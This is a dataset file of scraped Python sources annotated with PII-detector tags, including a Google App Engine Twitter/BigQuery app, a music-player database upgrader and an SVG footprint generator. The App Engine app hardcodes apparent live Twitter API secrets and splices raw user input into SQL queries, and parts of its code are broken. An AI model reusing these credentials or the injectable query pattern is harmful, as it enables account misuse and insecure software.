k,v in self.headers.iteritems() ]) + + +",5966,"[['PERSON', 'OrderedDict'], ['PERSON', 'odict'], ['PERSON', 'odict'], ['LOCATION', 'set_from(self'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], 
['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'self.bo'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.fr'], ['URL', 'self.kw'], ['URL', 'self.ch'], ['URL', 'self.fr'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.su'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.at'], ['URL', 'att.ge'], ['URL', 'att.ge'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ht'], ['URL', 're.su'], ['URL', 'self.text.pl'], ['URL', 'self.ch'], ['URL', 're.su'], ['URL', 'self.html.pl'], ['URL', 'self.ch'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.html.pl'], ['URL', 'self.html.pl'], ['URL', 'content.re'], ['URL', 'os.path.ba'], ['URL', 'self.bo'], ['URL', 'self.text.ge'], ['URL', 'self.text.ge'], ['URL', 'self.html.ge'], ['URL', 'self.html.ge'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.ge'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'datetime.datetime.no'], ['URL', 'sys.ma'], ['URL', 'self.kw.ge'], ['URL', 'self.re'], ['URL', 'self.ge'], ['URL', 'self.recipients.it'], ['URL', 'self.ch'], ['URL', 'self.bo'], ['URL', 'smtplib.SM'], ['URL', 'self.kw.ge'], ['URL', 's.se'], ['URL', 'self.fr'], ['URL', 'CRLF.jo'], ['URL', 'self.headers.it']]" +45,"__author__ = dummy@email.com (J. Matthew Landis)' + + +import os +import logging +import pickle +import webapp2 +import time +import httplib2 +import json +import tweepy +import haigha +from collections import Counter +from haigha.connections.rabbit_connection import RabbitConnection +from apiclient import discovery +from oauth2client import appengine +from oauth2client import client +from google.appengine.api import memcache +from google.appengine.api import users +from google.appengine.ext import ndb +from google.appengine.ext.webapp import template +####################################################################### + +PROJECTID = '934763316754' + +CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json') + +# Helpful message to display in the browser if the CLIENT_SECRETS file +# is missing. +MISSING_CLIENT_SECRETS_MESSAGE = """""""""" +

+Warning: Please configure OAuth 2.0
+
+To make this sample run you will need to populate the client_secrets.json file
+found at:
+
+%s.
+
+with information found on the APIs Console (https://code.google.com/apis/console).
    +"""""" % CLIENT_SECRETS + +http = httplib2.Http(memcache) +service = discovery.build(""plus"", ""v1"", http=http) +bigquery_service = discovery.build(""bigquery"",""v2"", http=http) + +consumer_key = ""9xNrmD6hE0xnRSYdZt5t0XT0B"" +consumer_secret = ""kperqjklvPhBCVvHI96aZIfJu5w1DHI2BZoNMdBEvBPfmuZIYG"" +access_token = ""46501499-cijYvv9ixtQKHLSiLt9QaRtcmWeEKvvGZK5s6ukw7"" +access_token_secret = ""D127XCAN02BPb0ZtcreCG6dpBJyiiLCeD6ckS2MgdHqwG"" + +auth = tweepy.OAuthHandler(consumer_key, consumer_secret) +auth.set_access_token(access_token, access_token_secret) +api = tweepy.API(auth) + +decorator = appengine.oauth2decorator_from_clientsecrets( + CLIENT_SECRETS, + scope='https://www.googleapis.com/auth/plus.me', + message=MISSING_CLIENT_SECRETS_MESSAGE) + +bq_decorator = appengine.oauth2decorator_from_clientsecrets( + CLIENT_SECRETS, + scope='https://www.googleapis.com/auth/bigquery', + message=MISSING_CLIENT_SECRETS_MESSAGE) + +## Function to retrieve and render a template +def render_template(handler, templatename, templatevalues): + path = os.path.join(os.path.dirname(__file__), 'templates/' + templatename) + html = template.render(path, templatevalues) + handler.response.out.write(html) + +####################################################################### +## Handles and loads index page +class MainPage(webapp2.RequestHandler): + + def get(self): + nickname = ""null"" + email = ""null"" + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + ui = res[0] + nickname = ui.fname+ "" "" +ui.lname + email = user.email() + login = users.create_login_url('/') + else: + nickname = user.nickname() + email = user.email() + login = '/createProfile' + else: + ui = None + login = users.create_login_url('/') + logout = users.create_logout_url('/') + os.system(""python stream.py"") + template_values = { + 'login': login, + 'logout': logout, + 'user': user, + 'nickname': nickname, + 'email': email + } + render_template(self, 'index.html', template_values) + +####################################################################### +## Handle user info and profile +class CreateProfile(webapp2.RequestHandler): + def get(self): + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + self.redirect('/profile') + else: + template_data = {'logout':users.create_logout_url('/'), 'nickname': users.nickname()} + template_path = 'templates/createProfile.html' + self.response.out.write(template.render(template_path,template_data)) + else: + self.redirect(user.create_login_url('/')) + + +####################################################################### +## process user profile +## check for user signed in, if so, save the entered information, otherwise, redirect them to the login page +class ProcessUser(webapp2.RequestHandler) : + + def post(self) : + user = users.get_current_user() + if user: + fname = self.request.get('fname') + lname = self.request.get('lname') + fname.replace("" "", """") + lname.replace("" "", """") + words = self.request.get_all('word') + if (not(not fname)) & (not(not lname)): + NewUser = UserModel() + NewUser.uid = user.user_id() + NewUser.fname = fname + NewUser.lname = lname + NewUser.words = [] + for word in words: + word.replace("" "", """") + if word: + NewUser.words+=[word] + NewUser.put() + self.redirect('/profile') + else: + self.redirect('/createProfile') + else: + self.redirect(users.create_login_url('/')) + 
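+#######################################################################
+## (Editorial sketch, not part of the original app: the DataHandler and
+## WordsHandler classes below splice raw user input straight into BigQuery
+## SQL strings, which invites query injection. A minimal, hypothetical
+## allow-list filter like this could be applied first, e.g.
+## inputData = sanitize_word(self.request.get(""inputData"")).)
+import re
+
+def sanitize_word(raw):
+    # keep only letters, digits and underscores, and cap the length
+    return re.sub(r'[^\w]', '', raw)[:64]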
+####################################################################### +## Model Data +class DataHandler(webapp2.RequestHandler) : + + @bq_decorator.oauth_aware + def get(self) : + if bq_decorator.has_credentials(): + http = bq_decorator.http() + inputData = self.request.get(""inputData"") + queryData = {'query':'SELECT SUM(word_count) as WCount,corpus_date,group_concat(corpus) as Work FROM ' +'[publicdata:samples.shakespeare] WHERE word=""'+inputData+'"" and corpus_date>0 GROUP BY corpus_date ORDER BY WCount'} + tableData = bigquery_service.jobs() + dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http) + + resp = [] + if 'rows' in dataList: + #parse dataList + for row in dataList['rows']: + for key,dict_list in row.iteritems(): + count = dict_list[0] + year = dict_list[1] + corpus = dict_list[2] + resp.append({'count': count['v'],'year':year['v'],'corpus':corpus['v']}) + else: + resp.append({'count':'0','year':'0','corpus':'0'}) + self.response.headers['Content-Type'] = 'application/json' + self.response.out.write(json.dumps(resp)) + else: + self.response.write(json.dumps({'error':'No credentials'})) + + +####################################################################### +## Model Words +class WordsHandler(webapp2.RequestHandler) : + + @bq_decorator.oauth_aware + def get(self) : + if bq_decorator.has_credentials(): + http = bq_decorator.http() + inputData = self.request.get(""inputData"") + queryData = {'query':'SELECT text FROM ' +'[doctor-know:rtda.tweets] WHERE Words CONTAINS ""'+inputData+'""GROUP BY text ORDER BY text LIMIT 150'} + tableData = bigquery_service.jobs() + dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http) + + resp = {} + resp['text'] = status.text + resp['created_at'] = time.mktime(status.created_at.timetuple()) + resp['geo'] = status.geo + resp['source'] = status.source + self.response.headers['Content-Type'] = 'application/json' + self.response.out.write(json.dumps(resp)) + else: + self.response.write(json.dumps({'error':'No credentials'})) + + +####################################################################### +## Model Words +class WordsHandler(webapp2.RequestHandler) : + + inputData = ""yes"" + @bq_decorator.oauth_aware + def get(self) : + if bq_decorator.has_credentials(): + http = bq_decorator.http() + inputData = self.request.get(""inputData"") + queryData = {'query':'SELECT text FROM ' +'[doctor-know:rtda.tweets] WHERE text CONTAINS ""'+inputData+'"" GROUP BY text ORDER BY text LIMIT 300'} + tableData = bigquery_service.jobs() + dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http) + + tweets = [] + if 'rows' in dataList: + #parse dataList + count = 0 + for row in dataList['rows']: + for key,dict_list in row.iteritems(): + tweet = dict_list[0] + count += 1 + tweets.append({'text': tweet}) + if count == 300: + break + + + ignore_words = [ ""fuck"", ""shit"", ""cock"", ""penis"", ""porn""] + words = [] + for tweet in tweets: + tt = tweet.get('text', """") + for word in tt.split(): + if ""http"" in word: + continue + if word not in ignore_words: + words.append(word) + + resp = Counter(words) + + resp.headers.add('Access-Control-Allow-Origin', ""*"") + return resp + + # self.response.headers['Content-Type'] = 'application/json' + # self.response.out.write(json.dumps(tweets)) + # else: + # self.response.write(json.dumps({'error':'No credentials'})) + + +####################################################################### +## Profile Page +class ProfilePage(webapp2.RequestHandler) 
: + + def get(self): + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + ui = res[0] + template_data = {'firstname': ui.fname, 'lastname': ui.lname, 'words': ui.words, 'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')} + template_path = 'templates/profile.html' + self.response.out.write(template.render(template_path,template_data)) + else: + self.redirect('/createProfile') + else: + self.redirect(users.create_login_url('/')) + +####################################################################### +## Artificial Creativity Engine +class DisplayEngine(webapp2.RequestHandler) : + + def get(self): + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + ui = res[0] + template_data = {'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')} + template_path = 'templates/engine.html' + self.response.out.write(template.render(template_path,template_data)) + else: + template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')} + template_path = 'templates/engine.html' + self.response.out.write(template.render(template_path,template_data)) + else: + self.redirect(users.create_login_url('/')) + + +####################################################################### +## Data Analysis +class DisplayData(webapp2.RequestHandler) : + + def get(self): + user = users.get_current_user() + if user: + res = UserModel.query(UserModel.uid == user.user_id()).fetch() + if res: + ui = res[0] + template_data = {'nickname': ui.fname+ "" "" +ui.lname, 'logout': users.create_logout_url('/')} + template_path = 'templates/data.html' + self.response.out.write(template.render(template_path,template_data)) + else: + template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')} + template_path = 'templates/data.html' + self.response.out.write(template.render(template_path,template_data)) + else: + self.redirect(users.create_login_url('/')) + + +####################################################################### +## Establish/Update User Profile +class UserModel(ndb.Model) : + uid = ndb.StringProperty(indexed=True) + fname = ndb.StringProperty(indexed = False) + lname = ndb.StringProperty(indexed = False) + words = ndb.StringProperty(indexed=False,repeated=True) + +####################################################################### +## Establish/Update User Profile +# class CustomStreamListener(tweepy.StreamListener): +# def __init__(self, api): +# self.api = api +# super(tweepy.StreamListener, self).__init__() + +# #setup rabbitMQ Connection +# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True) + +# self.channel = self.connection.channel() + +# #set max queue size +# args = {""x-max-length"": 2000} + +# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args) + +# def on_status(self, status): +# print status.text, ""\n"" + +# data = {} +# data['text'] = status.text +# data['created_at'] = time.mktime(status.created_at.timetuple()) +# data['geo'] = status.geo +# data['source'] = status.source + +# #queue the tweet +# self.channel.basic.publish(exchange='', +# routing_key='twitter_topic_feed', +# body=json.dumps(data)) + +# def on_error(self, status_code): +# print >> sys.stderr, 'Encountered error with status code:', status_code +# return True # Don't kill the stream + +# def on_timeout(self): +# print >> sys.stderr, 'Timeout...' 
+# return True # Don't kill the stream + +# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api)) +# # my keyword today is chelsea as the team just had a big win +# sapi.filter(track=[self.request.get(""inputData"")]) + +app = webapp2.WSGIApplication( [ + ('/', MainPage), + ('/profile', ProfilePage), + ('/createProfile', CreateProfile), + ('/userRegister', ProcessUser), + ('/getData', DataHandler), + ('/getWords', WordsHandler), + ('/data', DisplayData), + ('/engine', DisplayEngine), + (decorator.callback_path, decorator.callback_handler()), + (bq_decorator.callback_path, bq_decorator.callback_handler()) +], debug=True) +",15015,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'J. 
Matthew Landis'], ['PERSON', 'api = tweepy'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'user.ni'], ['URL', 'users.cr'], ['URL', 'users.cr'], ['URL', 'os.sy'], ['URL', 'stream.py'], ['URL', 'self.red'], ['URL', 'user.cr'], ['URL', 'self.red'], ['URL', 'users.cr'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['LOCATION', 'queryData).execute(http'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'profile.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'StreamListener'], ['PERSON', ""RabbitConnection(host='127.0.0.1""], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'StreamListener'], ['PERSON', ""RabbitConnection(host='127.0.0.1""], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'ProcessUser'], ['URL', 'https://code.google.com/apis/console""'], ['URL', ""https://www.googleapis.com/auth/plus.me',""], ['URL', ""https://www.googleapis.com/auth/bigquery',""], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'haigha.co'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'httplib2.Ht'], ['URL', 'auth.se'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'template.re'], ['URL', 'handler.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'index.ht'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.red'], ['URL', 'users.cr'], ['URL', 'users.ni'], ['URL', 'createProfile.ht'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'self.request.ge'], ['URL', 'self.request.ge'], ['URL', 'fname.re'], ['URL', 'lname.re'], ['URL', 'self.request.ge'], ['URL', 'user.us'], ['URL', 'word.re'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'samples.sh'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'tweet.ge'], ['URL', 'resp.headers.ad'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'ndb.Mo'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 
'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'webapp2.WS'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca']]" +46,"#!/usr/bin/python +# Copyright (c) 2014-2015 Cedric Bellegarde dummy@email.com +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + +from lollypop.sqlcursor import SqlCursor + + +class DatabaseUpgrade: + """""" + Manage database schema upgrades + """""" + + def __init__(self, version, db): + """""" + Init object + @param version as int + @param db as Database + """""" + self._version = version + self._db = db + # Here are schema upgrade, key is database version, + # value is sql request + self._UPGRADES = { + 1: ""update tracks set duration=CAST(duration as INTEGER);"", + 2: ""update albums set artist_id=-2001 where artist_id=-999;"" + } + + """""" + Return upgrade count + @return int + """""" + def count(self): + return len(self._UPGRADES) + + """""" + Upgrade database based on version + @return new db version as int + """""" + def do_db_upgrade(self): + with SqlCursor(self._db) as sql: + for i in range(self._version+1, len(self._UPGRADES)+1): + try: + sql.execute(self._UPGRADES[i]) + except Exception as e: + print(""Database upgrade failed: "", e) + sql.commit() + return len(self._UPGRADES) +",1917,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014-2015'], ['PERSON', 'Cedric Bellegarde'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'sql.com']]" +47,"# -*- coding: utf-8 -*- + +""""""Thread of structural synthesis."""""" + +__author__ = ""Yuan Chang"" +__copyright__ = ""Copyright (C) 2016-2021"" +__license__ = ""AGPL"" +__email__ = dummy@email.com"" + +from typing import Sequence, Dict, List +from qtpy.QtCore import Signal +from qtpy.QtWidgets import QWidget, QTreeWidgetItem +from pyslvs.graph import ( + link_synthesis, + contracted_link_synthesis, + contracted_graph, + conventional_graph, + Graph, +) +from pyslvs_ui.synthesis.thread import BaseThread + +Assortment = Sequence[int] + + +def assortment_eval(links_expr: str) -> Assortment: + """"""Return link assortment from expr."""""" + return tuple(int(n.split('=')[-1]) for n in links_expr.split("", "")) + + +class LinkThread(BaseThread): + """"""Link assortment synthesis thread."""""" + + progress_update = Signal(int) + result = Signal(dict) + size_update = Signal(int) + + 
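+    # (Editorial note, not in the original: these class-level Signals are how
+    # the worker thread hands data back to the GUI thread. A hypothetical
+    # caller would connect them before starting the thread, e.g.:
+    #     thread = LinkThread(nl=8, nj=10, parent=widget)
+    #     thread.progress_update.connect(progress_bar.setValue)
+    #     thread.result.connect(on_assortment_ready)
+    #     thread.start() )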
def __init__(self, nl: int, nj: int, parent: QWidget): + super(LinkThread, self).__init__(parent) + self.nl = nl + self.nj = nj + + def run(self) -> None: + """"""Run and return contracted link assortment."""""" + try: + la_list = link_synthesis(self.nl, self.nj, lambda: self.is_stop) + except ValueError: + self.progress_update.emit(1) + self.result.emit({}) + self.finished.emit() + return + + self.size_update.emit(len(la_list)) + assortment = {} + for i, la in enumerate(la_list): + if self.is_stop: + break + assortment[la] = contracted_link_synthesis(la, lambda: self.is_stop) + self.progress_update.emit(1 + i) + self.result.emit(assortment) + self.finished.emit() + + +class GraphThread(BaseThread): + """"""Graphs enumeration thread."""""" + progress_update = Signal(int) + count_update = Signal(QTreeWidgetItem, int) + result = Signal(list) + + def __init__(self, jobs: Sequence[QTreeWidgetItem], degenerate: int, parent: QWidget): + super(GraphThread, self).__init__(parent) + self.jobs = jobs + self.degenerate = degenerate + + def run(self) -> None: + """"""Run and return conventional graph."""""" + cg_list: Dict[Sequence[int], List[Graph]] = {} + answers = [] + for i, item in enumerate(self.jobs): + if self.is_stop: + break + + root = item.parent() + la = assortment_eval(root.text(0)) + cla = assortment_eval(item.text(0)) + if la not in cg_list: + cg_list[la] = contracted_graph(la, lambda: self.is_stop) + + answer = conventional_graph( + cg_list[la], + cla, + self.degenerate, + lambda: self.is_stop + ) + self.count_update.emit(item, len(answer)) + answers.extend(answer) + self.progress_update.emit(1 + i) + + self.result.emit(answers) + self.finished.emit() +",2931,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Yuan Chang'], ['DATE_TIME', '2016-2021'], ['PERSON', 'QtCore'], ['URL', 'self.nl'], ['URL', 'self.nl'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'self.pro'], ['PERSON', 'Sequence[QTreeWidgetItem'], ['URL', 'email.com'], ['URL', 'pyslvs.gr'], ['URL', 'ui.synthesis.th'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.si'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.jo'], ['URL', 'self.de'], ['URL', 'self.jo'], ['URL', 'self.is'], ['URL', 'item.pa'], ['URL', 'self.is'], ['URL', 'self.de'], ['URL', 'self.is'], ['URL', 'self.co'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi']]" +48,"#!/usr/bin/env python3 + +import xml.etree.ElementTree as ET + +def get_target(): + return SVG() + +class SVG: + def __init__(self): + self.svg = ET.parse('skeleton.svg') + self.mmpx = 3.543307 + + def output(self, path): + self.svg.write(path) + + + def add_package(self, package): + ''' + Target SVG only handles one drawing at a time, only last added drawing will be part of output + ''' + self.svg = ET.parse('skeleton.svg') + + self.package = \ + { + 'name': package['name'], + 'pads': [], + 'mnt_pads': [], + 'holes': [], + 'lines': [], + 'circles': [], + 'rectangles': [] , + 'texts': [] + } + + + def output(self, fout): + + package = self.package + + for pad in package['pads']: + self.gen_pac_pad(pad) + + for mnt_pad in package['mnt_pads']: # TODO, adding mnt_pads not done + self.gen_pac_mnt_pad(mnt_pad) + + for hole in package['holes']: + self.gen_pac_hole(hole) + + for line in package['lines']: + self.gen_pac_line(line) + + if(0): + + for circle in package['circles']: + self.gen_pac_circle(circle) + + for rect in package['rectangles']: + self.gen_pac_rectangle(rect) + + for text in package['texts']: + self.gen_pac_text(text) 
+ + self.svg.write(fout) + + + def add_pac_pad(self, type, angle, size, pos, number): + + self.package['pads'].append( + { + 'type': type, + 'angle': angle, + 'size': size, + 'pos': pos, + 'number': number + }) + + def add_pac_hole(self, diameter, pos): + + self.package['holes'].append( + { + 'd': diameter, + 'pos': pos + }) + + def add_pac_line(self, layer, width, vertices): + + self.package['lines'].append( + { + 'layer': layer, + 'width': width, + 'vertices': vertices + }) + + def gen_pac_pad(self, pad): # type, angle, size, pos, number + + top_layer = self.svg.find('.//g[@id=""Top""]') + + # TODO: Types and angle + + el = ET.SubElement(top_layer, 'rect') + el.set('style', 'fill:#ff0000;fill-opacity:1;stroke:none;stroke-width:10;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1') + el.set('id', 'pin_{}'.format(pad['number'])) + el.set('width', '{}'.format(pad['size'][0]*self.mmpx)) + el.set('height', '{}'.format(pad['size'][1]*self.mmpx)) + el.set('x', '{}'.format((pad['pos'][0] - pad['size'][0]/2)*self.mmpx)) + el.set('y', '{}'.format((pad['pos'][1] - pad['size'][1]/2)*self.mmpx)) + + + def gen_pac_hole(self, hole): + + top_layer = self.svg.find('.//g[@id=""Holes""]') + + circle = ET.SubElement(top_layer, 'circle') + + circle.set('style', 'fill:#eeee00;fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""') + + circle.set('cx', '{}'.format(hole['pos'][0]*self.mmpx)) + circle.set('cy', '{}'.format(hole['pos'][1]*self.mmpx)) + circle.set('r', '{}'.format(hole['d']/2*self.mmpx)) + + + def gen_pac_line(self, line): + + layer = self.svg.find(dummy@email.com(line['layer'])) + + if(line['layer'] == 'Courtyard'): + color = '#e63a81' + elif(line['layer'] == 'Silk'): + color = '#111111' + else: + color = '#000000' + + el = ET.SubElement(layer, 'path') + el.set('style', 'fill:none;fill-rule:evenodd;stroke:{color};stroke-width:{}mm;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;stroke-miterlimit:4;stroke-dasharray:none'.format(line['width'], color=color)) + + pathdata = '' + first = True + + for (x,y) in line['vertices']: + if(first): + pathdata += 'M ' + '{},{}'.format(x*self.mmpx,y*self.mmpx) + first = False + elif(x == 'end'): + pathdata += ' z' + else: + pathdata += ' L ' + '{},{}'.format(x*self.mmpx,y*self.mmpx) + + el.set('d', pathdata) + + + def gen_circle(self, layer_name, diameter, pos): + + layer = self.svg.find(dummy@email.com(layer_name)) + + if(layer_name == 'Courtyard'): + color = '#e63a81' + elif(layer_name == 'Silk'): + color = '#111111' + else: + color = '#000000' + + circle = ET.SubElement(layer, 'circle') + circle.set('style', 'fill:#{color};fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1""'.format(color=color)) + + circle.set('cx', '{}'.format(pos[0]*self.mmpx)) + circle.set('cy', '{}'.format(pos[1]*self.mmpx)) + circle.set('r', '{}'.format(diameter/2*self.mmpx)) + + +if(__name__ == '__main__'): + + target = get_target() + + target.output('test.svg') +",4250,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'fout'], ['LOCATION', ""package['holes""], ['PERSON', 'pos\n\t\t\t}'], ['PERSON', 'top_layer = self.svg.find(\'.//g[@id=""Top'], ['PERSON', 'TODO'], ['PERSON', ""el.set('style""], ['PERSON', ""el.set('height""], ['PERSON', ""circle.set('cx""], ['PERSON', ""circle.set('r""], ['LOCATION', '000000'], ['PERSON', ""el.set('style""], ['NRP', '000000'], 
